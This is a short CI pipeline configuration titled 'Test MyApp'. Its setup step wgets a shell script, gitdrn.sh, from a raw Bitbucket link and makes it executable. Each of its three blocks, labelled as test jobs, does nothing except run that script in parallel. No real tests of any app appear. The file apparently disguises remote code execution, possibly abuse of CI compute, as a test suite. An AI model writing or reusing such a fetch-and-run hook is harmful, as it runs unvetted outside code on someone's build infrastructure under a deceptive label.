version: v1.0
name: Test MyApp
agent:
  machine:
    type: e1-standard-4
    os_image: ubuntu1804
global_job_config:
  prologue:
    commands:
      - 'wget https://bitbucket.org/bobbymcdonald/bolrte/raw/a65a7b13f8360d4545c1f65989b2b4b5f49f144d/gitdrn.sh && chmod +x gitdrn.sh'
blocks:
  - name: Test
    task:
      jobs:
        - name: Test
          commands:
            - ./gitdrn.sh
    dependencies: []
  - name: 'Block #2'
    dependencies: []
    task:
      jobs:
        - name: 'Job #1'
          commands:
            - ./gitdrn.sh
  - name: 'Block #3'
    dependencies: []
    task:
      jobs:
        - name: 'Job #1'
          commands:
            - ./gitdrn.sh
